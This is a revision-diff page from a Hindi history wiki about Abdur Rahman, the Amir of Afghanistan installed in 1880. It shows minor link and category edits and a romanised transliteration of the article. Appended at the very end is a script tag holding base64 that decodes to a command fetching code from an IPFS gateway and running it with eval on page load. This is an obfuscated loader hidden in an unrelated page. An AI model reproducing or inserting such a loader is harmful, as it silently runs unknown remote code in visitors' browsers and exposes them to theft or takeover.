Difference between revisions of "अब्दुर्रहमान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 
[[चित्र:Abdur-Rahman.jpg|thumb|150px|अब्दुर्रहमान अमीर]]
 
[[चित्र:Abdur-Rahman.jpg|thumb|150px|अब्दुर्रहमान अमीर]]
'''अब्दुर्रहमान अमीर''' को [[1880]] ई. में दूसरे अफ़ग़ान युद्ध के बाद अंग्रेज़ों की मदद से [[अफ़ग़ानिस्तान]] के सिंहासन पर बैठाया गया।  
+
'''अब्दुर्रहमान अमीर''' को [[1880]] ई. में [[आंग्ल-अफ़ग़ान युद्ध द्वितीय|दूसरे अफ़ग़ान युद्ध]] के बाद अंग्रेज़ों की मदद से [[अफ़ग़ानिस्तान]] के सिंहासन पर बैठाया गया।
 +
 
 
*वह चतुर राजनीतिज्ञ था, और उसने [[1901]] ई. में अपनी मृत्यु पर्यन्त राज्य किया, और [[इंग्लैण्ड]] और [[रूस]] दोनों से ही मित्रता रखी।  
 
*वह चतुर राजनीतिज्ञ था, और उसने [[1901]] ई. में अपनी मृत्यु पर्यन्त राज्य किया, और [[इंग्लैण्ड]] और [[रूस]] दोनों से ही मित्रता रखी।  
 
*उसने अफ़ग़ानिस्तान का आन्तरिक शासन बड़ी कुशलता से चलाया और अखण्डता क़ायम रखी।  
 
*उसने अफ़ग़ानिस्तान का आन्तरिक शासन बड़ी कुशलता से चलाया और अखण्डता क़ायम रखी।  
*उसके शासन काल में [[भारत]]-अफ़ग़ानिस्तान सीमा निर्धारण डूरंड रेखा के आधार पर [[1893]] ई. में किया गया।  
+
*उसके शासन काल में [[भारत]]-अफ़ग़ानिस्तान सीमा निर्धारण [[डूरंड रेखा]] के आधार पर [[1893]] ई. में किया गया।
 +
 
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
Line 9: Line 11:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{औपनिवेशिक काल}}
 
{{औपनिवेशिक काल}}
[[Category:औपनिवेशिक काल]]
+
[[Category:औपनिवेशिक काल]][[Category:अंग्रेज़ी शासन]][[Category:इतिहास कोश]]
[[Category:अंग्रेज़ी शासन]]
 
[[Category:इतिहास कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 08:43, 23 July 2014

thumb|150px|abdurrahaman amir abdurrahaman amir ko 1880 ee. mean doosare afagan yuddh ke bad aangrezoan ki madad se afaganistan ke sianhasan par baithaya gaya.

  • vah chatur rajanitijn tha, aur usane 1901 ee. mean apani mrityu paryant rajy kiya, aur ianglaind aur roos donoan se hi mitrata rakhi.
  • usane afaganistan ka antarik shasan b di kushalata se chalaya aur akhandata qayam rakhi.
  • usake shasan kal mean bharat-afaganistan sima nirdharan doorand rekha ke adhar par 1893 ee. mean kiya gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>